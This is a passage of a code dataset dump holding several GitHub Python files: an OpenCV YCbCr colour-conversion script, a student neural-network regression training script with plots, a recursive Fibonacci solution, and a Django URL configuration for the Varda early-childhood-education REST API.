dpi=1200)","repo_name":"martinsaravia/pyDynamics","sub_path":"mslib/msutil.py","file_name":"msutil.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43269450217","text":"import cv2, time\n\nimage = cv2.imread(\"images/test.jpg\", cv2.IMREAD_COLOR)\nif image is None:\n raise Exception(\"Failed to read image file\")\n\nstart = time.time()\n\nB, G, R = cv2.split(image)\n\nY = 0.299 * R + 0.587 * G + 0.114 * B\nCb = (B - Y) * 0.564 + 128\nCr = (R - Y) * 0.713 + 128\n\nYCbCr = cv2.merge([Y, Cb, Cr])\n\nY, Cb, Cr = cv2.split(YCbCr)\n\nR = Y + 1.403 * (Cr - 128)\nG = Y - 0.714 * (Cr - 128) - 0.344 * (Cb - 128)\nB = Y + 1.773 * (Cb - 128)\n\nimage_revised = cv2.merge([B, G, R])\n\ntitle1, title2 = 'original', 'change'\n\nend = time.time()\nresult = (end-start) * 1000.0\nprint(f\"Execution time:{result: .2f} msec\")\n\ncv2.imshow(title1, image)\ncv2.imshow(title2, cv2.convertScaleAbs(image_revised))\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n","repo_name":"AYunBOM/Imagine_Processing_2023","sub_path":"Assignment_3/장보미_02.py","file_name":"장보미_02.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19564739821","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport itertools\n\n#read the copy pasted data\nfname = './data/data.txt'\nwith open(fname) as f:\n content = f.readlines()\ncontent = [x.strip().split() for x in content]\nx = [float(x[0]) for x in content]\nr = [float(x[1]) for x in content]\n#40-30-30 percent split of train, validation and test sets\ntra_x = x[:40]; tra_r = r[:40]; tra_y = [[]]*len(tra_r) #train set\nval_x = x[40:70]; val_r = r[40:70]; val_y = [[]]*len(val_r) #validation set\ntest_x = x[70:]; test_r = r[70:]; test_y = [[]]*len(test_r) #test set\n\n#define a function for calculating both sigmoid and derivative of the sigmoid function\n#(when derivative=True, x is assumed to already be a sigmoid output)\ndef sigmoid(x, derivative=False):\n return x*(1-x) if derivative else 1/(1+np.exp(-x))\n\n#plot function\ndef hiddenfigures(H, wx_list, zh_list, zhT_list, T_zero, e):\n for cv, h in enumerate(H):\n fig, axs = plt.subplots(1, 3, sharex=True, sharey=True)\n axs = axs.ravel()\n for h_unit in range(H[cv]):\n #plot lines that enter hidden units\n wx_x=np.vstack((tra_x,wx_list[sum(H[:cv]):sum(H[:cv+1]), :][h_unit] )).T\n wx_x_sorted=wx_x[wx_x[:,0].argsort()]\n axs[0].plot(wx_x_sorted[:,0], wx_x_sorted[:,1], '--', alpha=.6)\n #plot hidden unit outputs\n zh_x=np.vstack((tra_x, zh_list[sum(H[:cv]):sum(H[:cv+1]), :][h_unit])).T\n 
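# order the (x, output) pairs by x so the dashed curve is drawn left to right\n 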
zh_x_sorted=zh_x[zh_x[:,0].argsort()]\n axs[1].plot(zh_x_sorted[:,0], zh_x_sorted[:,1], '--', alpha=.6)\n axs[1].set_title('H={} Epoch={}'.format(H[cv], e))\n #plot hidden unit weighted outputs\n zhT_x=np.vstack((tra_x,zhT_list[sum(H[:cv]):sum(H[:cv+1]),:][h_unit])).T\n zhT_x_sorted=zhT_x[zhT_x[:,0].argsort()]\n axs[2].plot(zhT_x_sorted[:,0], zhT_x_sorted[:,1], '--', alpha=.6)\n for i in range(3):\n axs[i].plot(tra_x, tra_r, 'b+', alpha=.6) #training data\n pred=np.vstack((tra_x, tra_y_list[cv])).T\n pred_sorted=pred[pred[:,0].argsort()]\n axs[i].plot(pred_sorted[:,0],pred_sorted[:,1],'b-',alpha=.8) #fitted values\n axs[i].set_ylim([-6, 6])\n axs[i].axhline(T_zero[cv], linestyle='-', color='blue', alpha=.3) #T0 line\n\nd=[40, 30, 30] #dimensions of training, validation and test sets\nH = [2, 4, 30] #number of hidden units\nHplus1 = [x+1 for x in H]\neph=500 #number of epochs\nl=.999; eta = .1 # l: decrement factor, eta: learning rate\nalpha=0.5 #momentum factor\ne_list=[9, 199, 499] #epoch numbers for training data figures with best H\nbest_H=[H[1]]\n\n#sizes of training, validation and test sets are different, thus MSE is used instead of SSE\nerr_tra_list = [[] for i in range(len(H))] #list for training MSE's\nerr_val_list = [[] for i in range(len(H))] #list for validation MSE's\ntra_y_list = np.zeros((len(H),len(tra_x))) #list for training predictions\nT_zero = [[] for i in range(len(H))] #list for bias hidden unit weight to output\nT_zero2 = [] #list for bias hidden unit weight to output\n\nw_list = np.zeros((sum(H), 2)) #list for final weights on 3 different H values\nT_list = np.zeros((sum(H)+3, 1)) #list for final weights on 3 different H values\nwx_list = np.zeros((sum(H), len(tra_x))) #list for hidden unit lines\nzh_list = np.zeros((sum(H), len(tra_x))) #list for hidden unit outputs\nzhT_list = np.zeros((sum(H), len(tra_x))) #list for hidden unit weighted outputs\nwx_list2 = np.zeros((sum(H), len(tra_x))) #list for hidden unit lines\nzh_list2 = np.zeros((sum(H), len(tra_x))) #list for hidden unit outputs\nzhT_list2 = np.zeros((sum(H), len(tra_x))) #list for hidden unit weighted outputs\nfor cv, h in enumerate(H):\n #initialize first and second layer weights\n w=np.random.uniform(-.01, .01, (h, 2))\n T=np.random.uniform(-.01, .01, h+1)\n for e in range(eph):\n #print(\"epoch: \", e)\n err_tra=0\n err_val=0\n t1_idx = list(range(d[0]))\n np.random.shuffle(t1_idx)\n prev_dw=0 #initialize weight change of previous instance\n for t1, t2 in itertools.zip_longest(t1_idx, range(d[1])): # d[1] is the dimension of the validation set\n #training set\n tra_x_t1=np.append(1, tra_x[t1])\n zh = sigmoid(np.dot(w,tra_x_t1))\n zh_all = np.append(1, zh) #set bias unit to 1\n tra_y = np.sum(T*zh_all)\n dT = eta*(tra_r[t1]-tra_y)*zh_all\n dw = np.outer((eta*(tra_r[t1]-tra_y)*T[1:])*sigmoid(zh, derivative=True), tra_x_t1)-alpha*prev_dw\n prev_dw=dw # weight change of previous instance for momentum calculations\n w+=dw\n T+=dT\n err_tra+= pow((tra_r[t1]-tra_y), 2)/len(tra_x) # MSE for training instances\n #store predictions for the last epoch\n if e==eph-1:\n tra_y_list[cv][t1]=tra_y\n #validation set\n try:\n val_x_t2=np.append(1, val_x[t2])\n zh_val = sigmoid(np.dot(w,val_x_t2))\n zh_val_all = np.append(1, zh_val) #set bias unit to 1\n val_y = np.sum(T*zh_val_all)\n err_val+= pow((val_r[t2]-val_y), 2)/len(val_x) # MSE for validation instances\n except:\n pass\n eta*=l\n err_tra_list[cv].append(err_tra)\n try:\n err_val_list[cv].append(err_val)\n except:\n pass\n if e in e_list and h==H[1]:\n 
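# snapshot hidden-unit lines, activations and weighted outputs at the selected epochs for plotting\n 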
wx2=np.dot(w,np.vstack((np.ones((40,)), tra_x)))\n wx_list2[sum(H[:cv]):sum(H[:cv+1]),:]=wx2\n zhs2=sigmoid(np.dot(w,np.vstack((np.ones((40,)), tra_x))))\n zh_list2[sum(H[:cv]):sum(H[:cv+1]),:]=zhs2\n zhT2=(((sigmoid(np.dot(w,np.vstack((np.ones((40,)), tra_x))))).T)*T[1:]).T\n zhT_list2[sum(H[:cv]):sum(H[:cv+1]),:]=zhT2\n T_zero2.append(T[0])\n hiddenfigures(best_H, wx_list2, zh_list2, zhT_list2, T_zero2, e+1)\n\n T_zero[cv]=T[0]\n w_list[sum(H[:cv]):sum(H[:cv+1]),:]=w\n T_list[sum(Hplus1[:cv]):sum(Hplus1[:cv+1])]=T.reshape(H[cv]+1, 1)\n wx=np.dot(w,np.vstack((np.ones((40,)), tra_x)))\n wx_list[sum(H[:cv]):sum(H[:cv+1]),:]=wx\n zhs=sigmoid(np.dot(w,np.vstack((np.ones((40,)), tra_x))))\n zh_list[sum(H[:cv]):sum(H[:cv+1]),:]=zhs\n zhT=(((sigmoid(np.dot(w,np.vstack((np.ones((40,)), tra_x))))).T)*T[1:]).T\n zhT_list[sum(H[:cv]):sum(H[:cv+1]),:]=zhT\n print(\"MSE for training with H={} is {}\".format(H[cv],err_tra_list[cv][-1]))\n print(\"MSE for validation with H={} is {}\".format(H[cv],err_val_list[cv][-1]))\n\n#plot errors\nfig,ax = plt.subplots()\nax.plot(range(eph), err_tra_list[1], '-', alpha=.8)\nax.plot(range(eph), err_val_list[1], '--', dashes=(1,2), alpha=.8 )\nax.legend(['Training', 'Validation'])\nplt.title('MSE for Training&Validation Sets with H={}'.format(H[1]))\nplt.xlabel('Epochs')\nplt.ylabel('MSE')\nax.set_ylim([0,1])\n\n#test set\nerr_test=0 #MSE for test set\nfor t in range(d[2]): # d[2] is the dimension of the test set\n test_x_t=np.append(1, test_x[t])\n zh = sigmoid(np.dot(w_list[2:6],test_x_t))\n zh_all = np.append(1, zh) #set bias unit to 1\n test_y = np.sum(T_list[3:8]*zh_all.reshape(5,1))\n err_test+= pow((test_r[t]-test_y), 2)/len(test_x) # MSE for test set instances\nMSE_test = err_test\nprint(MSE_test)\nhiddenfigures(H, wx_list, zh_list, zhT_list, T_zero, e+1)\n","repo_name":"zeynep-ozturk/neural-networks","sub_path":"neural_networks.py","file_name":"neural_networks.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24894466323","text":"# Fn = Fn-1 + Fn-2 (n ≥ 2)\ndef fibo(n):\n if n == 1 or n == 2:\n return 1\n elif n == 0:\n return 0\n else:\n return fibo(n-1) + fibo(n-2)\n \na = int(input())\n\nprint(fibo(a))","repo_name":"hayleyun/baekjoon","sub_path":"10870피보나치수5.py","file_name":"10870피보나치수5.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8348693275","text":"\"\"\"webapps URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/dev/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nimport re\n\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\nfrom django.urls import include, re_path\nfrom django.views.decorators.clickjacking import xframe_options_exempt, xframe_options_sameorigin\nfrom django_spaghetti.views import Plate\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view as get_schema_view_yasg\nfrom rest_framework import permissions, routers\nfrom rest_framework.renderers import CoreJSONRenderer\nfrom rest_framework.schemas import get_schema_view\nfrom rest_framework_nested import routers as nested_routers\n\nfrom varda import (views, viewsets, viewsets_admin, viewsets_henkilosto, viewsets_julkinen, viewsets_oppija,\n viewsets_reporting, viewsets_ui)\nfrom varda.cas.cas_components import OppijaCasLoginView\nfrom varda.constants import SWAGGER_DESCRIPTION\nfrom varda.custom_swagger import PublicSchemaGenerator, PublicSwaggerRenderer\nfrom varda.monkey_patch import cas_views, oppija_cas_views\n\n\n# /api/admin/\nrouter_admin = routers.DefaultRouter()\nrouter_admin.register(r'users', viewsets.UserViewSet)\nrouter_admin.register(r'groups', viewsets.GroupViewSet)\nrouter_admin.register(r'update-henkilo', viewsets.UpdateHenkiloWithOid, basename='update-henkilo')\nrouter_admin.register(r'huoltajat', viewsets.HuoltajaViewSet)\nrouter_admin.register(r'huoltajuussuhteet', viewsets.HuoltajuussuhdeViewSet)\nrouter_admin.register(r'clear-cache', viewsets.ClearCacheViewSet, basename='clear-cache')\nrouter_admin.register(r'hae-yksiloimattomat', viewsets.HaeYksiloimattomatHenkilotViewSet, basename='hae-yksiloimattomat')\nrouter_admin.register(r'anonymisointi-yhteenveto', viewsets_admin.AnonymisointiYhteenvetoViewSet, basename='anonymisointi-yhteenveto')\nrouter_admin.register(r'duplicate-lapsi-objects', viewsets_reporting.DuplicateLapsiViewSet, basename='duplicate-lapsi-objects')\nrouter_admin.register(r'set-paattymis-pvm', viewsets_admin.SetPaattymisPvmViewSet, basename='set-paattymis-pvm')\n\n# /api/admin/huoltajat/.../\nrouter_admin_nested_huoltaja = nested_routers.NestedSimpleRouter(router_admin, r'huoltajat', lookup='huoltaja')\n# /api/admin/huoltajat/{id}/lapset/\nrouter_admin_nested_huoltaja.register(r'lapset', viewsets.NestedLapsiViewSet)\n\n# /api/user/\nrouter_user = routers.DefaultRouter()\nrouter_user.register(r'data', viewsets.ActiveUserViewSet)\nrouter_user.register(r'apikey', viewsets.ApikeyViewSet)\n\n# /api/pulssi/\nrouter_pulssi = routers.DefaultRouter()\nrouter_pulssi.register(r'vakajarjestajat', viewsets.PulssiVakajarjestajat, basename='pulssi-vakajarjestajat')\n\n# /api/v1/\nrouter = routers.DefaultRouter()\nrouter.register(r'vakajarjestajat', viewsets.OrganisaatioViewSet)\nrouter.register(r'toimipaikat', viewsets.ToimipaikkaViewSet)\nrouter.register(r'toiminnallisetpainotukset', viewsets.ToiminnallinenPainotusViewSet)\nrouter.register(r'kielipainotukset', viewsets.KieliPainotusViewSet)\nrouter.register(r'hae-henkilo', viewsets.HaeHenkiloViewSet, 'hae-henkilo')\nrouter.register(r'henkilot', viewsets.HenkiloViewSet)\nrouter.register(r'lapset', viewsets.LapsiViewSet)\nrouter.register(r'maksutiedot', viewsets.MaksutietoViewSet)\nrouter.register(r'varhaiskasvatuspaatokset', viewsets.VarhaiskasvatuspaatosViewSet)\nrouter.register(r'varhaiskasvatussuhteet', viewsets.VarhaiskasvatussuhdeViewSet)\nrouter.register(r'paos-toiminnat', 
viewsets.PaosToimintaViewSet)\nrouter.register(r'paos-oikeudet', viewsets.PaosOikeusViewSet)\n\n# /api/v1/vakajarjestajat/.../\nrouter_nested_vakajarjestaja = nested_routers.NestedSimpleRouter(router, r'vakajarjestajat', lookup='organisaatio')\n# /api/v1/vakajarjestajat/{id}/toimipaikat/\nrouter_nested_vakajarjestaja.register(r'toimipaikat', viewsets.NestedToimipaikkaViewSet)\n# /api/v1/vakajarjestajat/{id}/yhteenveto/\nrouter_nested_vakajarjestaja.register(r'yhteenveto', viewsets.NestedOrganisaatioYhteenvetoViewSet)\n# /api/v1/vakajarjestajat/{id}/error-report-lapset/\nrouter_nested_vakajarjestaja.register('error-report-lapset', viewsets_reporting.ErrorReportLapsetViewSet, basename='error-report-lapset')\n# /api/v1/vakajarjestajat/{id}/error-report-tyontekijat/\nrouter_nested_vakajarjestaja.register('error-report-tyontekijat', viewsets_reporting.ErrorReportTyontekijatViewSet, basename='error-report-tyontekijat')\n# /api/v1/vakajarjestajat/{id}/error-report-toimipaikat/\nrouter_nested_vakajarjestaja.register('error-report-toimipaikat', viewsets_reporting.ErrorReportToimipaikatViewSet, basename='error-report-toimipaikat')\n# /api/v1/vakajarjestajat/{id}/paos-toimijat/\nrouter_nested_vakajarjestaja.register(r'paos-toimijat', viewsets.NestedVakajarjestajaPaosToimijatViewSet)\n# /api/v1/vakajarjestajat/{id}/paos-toimipaikat/\nrouter_nested_vakajarjestaja.register(r'paos-toimipaikat', viewsets.NestedVakajarjestajaPaosToimipaikatViewSet)\n\n# /api/v1/toimipaikat/.../\nrouter_nested_toimipaikka = nested_routers.NestedSimpleRouter(router, r'toimipaikat', lookup='toimipaikka')\n# /api/v1/toimipaikat/{id}/toiminnallisetpainotukset/\nrouter_nested_toimipaikka.register(r'toiminnallisetpainotukset', viewsets.NestedToiminnallinenPainotusViewSet)\n# /api/v1/toimipaikat/{id}/kielipainotukset/\nrouter_nested_toimipaikka.register(r'kielipainotukset', viewsets.NestedKieliPainotusViewSet)\n# /api/v1/toimipaikat/{id}/varhaiskasvatussuhteet/\nrouter_nested_toimipaikka.register(r'varhaiskasvatussuhteet', viewsets.NestedVarhaiskasvatussuhdeToimipaikkaViewSet)\n\n# /api/v1/lapset/.../\nrouter_nested_lapsi = nested_routers.NestedSimpleRouter(router, r'lapset', lookup='lapsi')\n# /api/v1/lapset/{id}/huoltajat/\nrouter_nested_lapsi.register(r'huoltajat', viewsets.NestedHuoltajaViewSet)\n# /api/v1/lapset/{id}/varhaiskasvatuspaatokset/\nrouter_nested_lapsi.register(r'varhaiskasvatuspaatokset', viewsets.NestedVarhaiskasvatuspaatosViewSet)\n# /api/v1/lapset/{id}/maksutiedot/\nrouter_nested_lapsi.register(r'maksutiedot', viewsets.NestedLapsiMaksutietoViewSet)\n# /api/v1/lapset/{id}/varhaiskasvatussuhteet/\nrouter_nested_lapsi.register(r'varhaiskasvatussuhteet', viewsets.NestedLapsenVarhaiskasvatussuhdeViewSet)\n# /api/v1/lapset/{id}/kooste/\nrouter_nested_lapsi.register(r'kooste', viewsets.NestedLapsiKoosteViewSet)\n\n# /api/v1/varhaiskasvatuspaatokset/.../\nrouter_nested_varhaiskasvatuspaatos = nested_routers.NestedSimpleRouter(router, r'varhaiskasvatuspaatokset', lookup='varhaiskasvatuspaatos')\n# /api/v1/varhaiskasvatuspaatokset/{id}/varhaiskasvatussuhteet/\nrouter_nested_varhaiskasvatuspaatos.register(r'varhaiskasvatussuhteet', viewsets.NestedVarhaiskasvatussuhdeViewSet)\n\n# /api/ui/\nrouter_ui = routers.DefaultRouter()\nrouter_ui.register(r'vakajarjestajat', viewsets_ui.UiVakajarjestajatViewSet, basename='hae-vakajarjestajat')\nrouter_ui.register(r'all-vakajarjestajat', viewsets_ui.AllVakajarjestajaViewSet, basename='all-vakajarjestajat')\n\n# /api/ui/vakajarjestajat/.../\nrouter_ui_nested_vakajarjestaja = 
nested_routers.NestedSimpleRouter(router_ui, r'vakajarjestajat', lookup='organisaatio')\n# /api/ui/vakajarjestajat/{id}/toimipaikat/\nrouter_ui_nested_vakajarjestaja.register(r'toimipaikat', viewsets_ui.NestedToimipaikkaViewSet)\n# /api/ui/vakajarjestajat/{id}/lapset/\nrouter_ui_nested_vakajarjestaja.register(r'lapset', viewsets_ui.UiNestedLapsiViewSet)\n# /api/ui/vakajarjestajat/{id}/tyontekijat/\nrouter_ui_nested_vakajarjestaja.register(r'tyontekijat', viewsets_ui.UiNestedTyontekijaViewSet)\n# /api/ui/vakajarjestajat/{id}/all-toimipaikat/\nrouter_ui_nested_vakajarjestaja.register(r'all-toimipaikat', viewsets_ui.NestedAllToimipaikkaViewSet)\n\n# /api/onr/\nrouter_onr = routers.DefaultRouter()\nrouter_onr.register(r'external-permissions', viewsets.ExternalPermissionsViewSet, 'external-permissions')\n\n# /api/reporting/\nrouter_reporting = routers.DefaultRouter()\n# /api/reporting/v1/tiedonsiirtotilasto/\nrouter_reporting.register(r'tiedonsiirtotilasto', viewsets_reporting.TiedonsiirtotilastoViewSet, basename='tiedonsiirtotilasto')\n# /api/reporting/v1/tiedonsiirto/\nrouter_reporting.register(r'tiedonsiirto', viewsets_reporting.TiedonsiirtoViewSet, basename='tiedonsiirto')\n# /api/reporting/v1/tiedonsiirto/yhteenveto/\nrouter_reporting.register(r'tiedonsiirto/yhteenveto', viewsets_reporting.TiedonsiirtoYhteenvetoViewSet, basename='tiedonsiirto-yhteenveto')\n# /api/reporting/v1/excel-reports/\nrouter_reporting.register(r'excel-reports', viewsets_reporting.ExcelReportViewSet, basename='excel-reports')\n# /api/reporting/v1/transfer-outage/\nrouter_reporting.register(r'transfer-outage', viewsets_reporting.TransferOutageReportViewSet, basename='transfer-outage')\n# /api/reporting/v1/request-summary/\nrouter_reporting.register(r'request-summary', viewsets_reporting.RequestSummaryViewSet, basename='request-summary')\n\n# /api/reporting/v1/kela/etuusmaksatus/\nrouter_kela_reporting = routers.DefaultRouter()\nrouter_kela_reporting.register(r'aloittaneet', viewsets_reporting.KelaEtuusmaksatusAloittaneetViewset, basename='aloittaneet')\nrouter_kela_reporting.register(r'lopettaneet', viewsets_reporting.KelaEtuusmaksatusLopettaneetViewSet, 'lopettaneet')\nrouter_kela_reporting.register(r'maaraaikaiset', viewsets_reporting.KelaEtuusmaksatusMaaraaikaisetViewSet, 'maaraaikaset')\nrouter_kela_reporting.register(r'korjaustiedot', viewsets_reporting.KelaEtuusmaksatusKorjaustiedotViewSet, 'korjaustiedot')\nrouter_kela_reporting.register(r'korjaustiedotpoistetut', viewsets_reporting.KelaEtuusmaksatusKorjaustiedotPoistetutViewSet, 'korjaustiedotpoistetut')\n\n# /api/reporting/v1/tilastokeskus/\nrouter_tilastokeskus_reporting = routers.DefaultRouter()\nrouter_tilastokeskus_reporting.register(r'organisaatiot', viewsets_reporting.TkOrganisaatiot, basename='organisaatiot')\nrouter_tilastokeskus_reporting.register(r'varhaiskasvatustiedot', viewsets_reporting.TkVakatiedot, basename='varhaiskasvatustiedot')\nrouter_tilastokeskus_reporting.register(r'henkilostotiedot', viewsets_reporting.TkHenkilostotiedot, basename='henkilostotiedot')\n\n# /api/reporting/v1/valssi/\nrouter_valssi_reporting = routers.DefaultRouter()\nrouter_valssi_reporting.register(r'organisaatiot', viewsets_reporting.ValssiOrganisaatioViewSet, basename='valssi-organisaatiot')\nrouter_valssi_reporting.register(r'toimipaikat', viewsets_reporting.ValssiToimipaikkaViewSet, basename='valssi-toimipaikat')\n\n# /api/reporting/v1/valssi/organisaatiot/.../\nrouter_valssi_reporting_nested_organisaatio = nested_routers.NestedSimpleRouter(router_valssi_reporting, 
r'organisaatiot', lookup='organisaatio')\n# /api/reporting/v1/valssi/organisaatiot/{id}/taustatiedot/\nrouter_valssi_reporting_nested_organisaatio.register(r'taustatiedot', viewsets_reporting.ValssiTaustatiedotViewSet)\n\n# /api/reporting/v1/valssi/toimipaikat/.../\nrouter_valssi_reporting_nested_toimipaikka = nested_routers.NestedSimpleRouter(router_valssi_reporting, r'toimipaikat', lookup='toimipaikka')\n# /api/reporting/v1/valssi/toimipaikat/{id}/tyontekijat/\nrouter_valssi_reporting_nested_toimipaikka.register(r'tyontekijat', viewsets_reporting.ValssiTyontekijaViewSet)\n\n# /api/oppija/v1/\nrouter_oppija = routers.DefaultRouter()\n# /api/oppija/v1/henkilotiedot/{oid}/\nrouter_oppija.register(r'henkilotiedot', viewsets_oppija.HenkilotiedotViewSet)\n# /api/oppija/v1/varhaiskasvatustiedot/{oid}/\nrouter_oppija.register(r'varhaiskasvatustiedot', viewsets_oppija.VarhaiskasvatustiedotViewSet)\n# /api/oppija/v1/huoltajatiedot/{oid}/\nrouter_oppija.register(r'huoltajatiedot', viewsets_oppija.HuoltajatiedotViewSet)\n# /api/oppija/v1/tyontekijatiedot/{oid}/\nrouter_oppija.register(r'tyontekijatiedot', viewsets_oppija.TyontekijatiedotViewSet)\n\n# /api/henkilosto/v1/\nrouter_henkilosto = routers.DefaultRouter()\nrouter_henkilosto.register(r'tyontekijat', viewsets_henkilosto.TyontekijaViewSet)\nrouter_henkilosto.register(r'tilapainen-henkilosto', viewsets_henkilosto.TilapainenHenkilostoViewSet)\nrouter_henkilosto.register(r'tutkinnot', viewsets_henkilosto.TutkintoViewSet)\nrouter_henkilosto.register(r'palvelussuhteet', viewsets_henkilosto.PalvelussuhdeViewSet)\nrouter_henkilosto.register(r'tyoskentelypaikat', viewsets_henkilosto.TyoskentelypaikkaViewSet)\nrouter_henkilosto.register(r'pidemmatpoissaolot', viewsets_henkilosto.PidempiPoissaoloViewSet)\nrouter_henkilosto.register(r'taydennyskoulutukset', viewsets_henkilosto.TaydennyskoulutusViewSet)\n\n# /api/henkilosto/v1/tyontekijat/.../\nrouter_henkilosto_nested_tyontekija = nested_routers.NestedDefaultRouter(router_henkilosto, r'tyontekijat', lookup='tyontekija')\n# /api/henkilosto/v1/tyontekijat/{id}/kooste/\nrouter_henkilosto_nested_tyontekija.register(r'kooste', viewsets_henkilosto.NestedTyontekijaKoosteViewSet)\n\n# /api/henkilosto/v2/\nrouter_henkilosto_v2 = routers.DefaultRouter()\nrouter_henkilosto_v2.register(r'taydennyskoulutukset', viewsets_henkilosto.TaydennyskoulutusV2ViewSet, basename='taydennyskoulutukset-v2')\n\n# /api/julkinen/v1/\nrouter_julkinen = routers.DefaultRouter()\nrouter_julkinen.register(r'koodistot', viewsets_julkinen.KoodistotViewSet)\nrouter_julkinen.register(r'localisation', viewsets_julkinen.LocalisationViewSet, basename='get-localisation')\nrouter_julkinen.register(r'pulssi', viewsets_julkinen.PulssiViewSet, basename='get-pulssi')\n\n# /api/v1/schema/\nschema_view = get_schema_view(title='VARDA API', renderer_classes=[CoreJSONRenderer])\n\n# In production environment public-app accesses iframes via nginx proxy, so we can use a stricter policy\nxframe_options = xframe_options_sameorigin if settings.PRODUCTION_ENV or settings.QA_ENV else xframe_options_exempt\n\n# /api/julkinen/v1/swagger/\nschema_view_public = get_schema_view_yasg(\n openapi.Info(\n title='VARDA REST API',\n default_version='v1',\n description=SWAGGER_DESCRIPTION\n ),\n public=True,\n url='https://varda.example.com/api/',\n permission_classes=(permissions.AllowAny,),\n generator_class=PublicSchemaGenerator,\n)\npublic_swagger_view = xframe_options(\n schema_view_public.as_cached_view(cache_timeout=0, cache_kwargs=None,\n 
renderer_classes=(PublicSwaggerRenderer,) + schema_view_public.renderer_classes)\n)\n\n# /api/julkinen/v1/data-model/\nexcluded_model_regex = re.compile(r'^(historical.*)|(z\\d.*)|(logdata)|(aikaleima)|(batcherror)|(logincertificate)$')\nmodel_visualization_view = xframe_options(\n    Plate.as_view(\n        settings={\n            'apps': ['varda'],\n            'show_fields': False,\n            'exclude': {'varda': [model.__name__.lower() for model in apps.get_app_config('varda').get_models()\n                                  if excluded_model_regex.fullmatch(model.__name__.lower())]}}\n    )\n)\n\nurlpatterns = [\n    re_path(r'^$', views.index, name='index'),\n    re_path(r'^admin/', admin.site.urls, name='admin'),\n    re_path(r'^varda/', include('varda.urls'), name='varda'),\n    re_path(r'^accounts/login$', cas_views.LoginView.as_view(), name='cas_ng_login'),\n    re_path(r'^accounts/logout$', cas_views.LogoutView.as_view(), name='cas_ng_logout'),\n    re_path(r'^accounts/callback$', cas_views.CallbackView.as_view(), name='cas_ng_proxy_callback'),\n    re_path(r'^accounts/huoltaja-login$', OppijaCasLoginView.as_view(), name='oppija_cas_ng_login'),\n    re_path(r'^accounts/huoltaja-logout$', oppija_cas_views.LogoutView.as_view(), name='oppija_cas_ng_logout'),\n    re_path(r'^accounts/password-reset/?$', auth_views.PasswordResetView.as_view(), name='admin_password_reset'),\n    re_path(r'^accounts/password-reset/done/?$', auth_views.PasswordResetDoneView.as_view(), name='password_reset_done'),\n    re_path(r'^accounts/reset/(?P<uidb64>.+)/(?P<token>.+)/?$', auth_views.PasswordResetConfirmView.as_view(), name='password_reset_confirm'),\n    re_path(r'^accounts/reset/done/?$', auth_views.PasswordResetCompleteView.as_view(), name='password_reset_complete'),\n    re_path(r'^api-auth/', include('varda.custom_login_urls', namespace='rest_framework'), name='api_auth'),\n    re_path(r'^api/onr/', include(router_onr.urls), name='api_onr'),\n    re_path(r'^api/user/', include(router_user.urls), name='api_user'),\n    re_path(r'^api/admin/', include(router_admin.urls), name='api_admin'),\n    re_path(r'^api/admin/', include(router_admin_nested_huoltaja.urls), name='api_admin_nested_huoltaja'),\n    re_path(r'^api/pulssi/', include(router_pulssi.urls), name='api_pulssi'),\n    re_path(r'^api/ui/', include(router_ui.urls), name='api_ui'),\n    re_path(r'^api/ui/', include(router_ui_nested_vakajarjestaja.urls), name='api_ui_nested_vakajarjestaja'),\n    re_path(r'^api/v1/', include(router.urls), name='api_v1'),\n    re_path(r'^api/v1/', include(router_nested_vakajarjestaja.urls), name='api_v1_nested_vakajarjestaja'),\n    re_path(r'^api/v1/', include(router_nested_toimipaikka.urls), name='api_v1_nested_toimipaikka'),\n    re_path(r'^api/v1/', include(router_nested_lapsi.urls), name='api_v1_nested_lapsi'),\n    re_path(r'^api/v1/', include(router_nested_varhaiskasvatuspaatos.urls), name='api_v1_nested_varhaiskasvatuspaatos'),\n    re_path(r'^api/v1/schema/', schema_view, name='api_v1_schema'),\n    re_path(r'^api/reporting/v1/', include(router_reporting.urls), name='api_reporting_v1'),\n    re_path(r'^api/reporting/v1/kela/etuusmaksatus/', include(router_kela_reporting.urls), name='api_reporting_v1_kela'),\n    re_path(r'^api/reporting/v1/tilastokeskus/', include(router_tilastokeskus_reporting.urls), name='api_reporting_v1_tilastokeskus'),\n    re_path(r'^api/reporting/v1/valssi/', include(router_valssi_reporting.urls), name='api_reporting_v1_valssi'),\n    re_path(r'^api/reporting/v1/valssi/', include(router_valssi_reporting_nested_organisaatio.urls), name='api_reporting_v1_valssi_nested_organisaatio'),\n    re_path(r'^api/reporting/v1/valssi/', 
include(router_valssi_reporting_nested_toimipaikka.urls), name='api_reporting_v1_valssi_nested_toimipaikka'),\n re_path(r'^api/henkilosto/v1/', include(router_henkilosto.urls), name='api_henkilosto_v1'),\n re_path(r'^api/henkilosto/v1/', include(router_henkilosto_nested_tyontekija.urls), name='api_henkilosto_v1_nested_tyontekija'),\n re_path(r'^api/henkilosto/v2/', include(router_henkilosto_v2.urls), name='api_henkilosto_v2'),\n re_path(r'^api/oppija/v1/', include(router_oppija.urls), name='api_oppija_v1'),\n re_path(r'^api/julkinen/v1/', include(router_julkinen.urls), name='api_julkinen_v1'),\n re_path(r'^api/julkinen/v1/swagger/$', public_swagger_view, name='api_julkinen_v1_swagger'),\n re_path(r'^api/julkinen/v1/data-model/$', model_visualization_view, 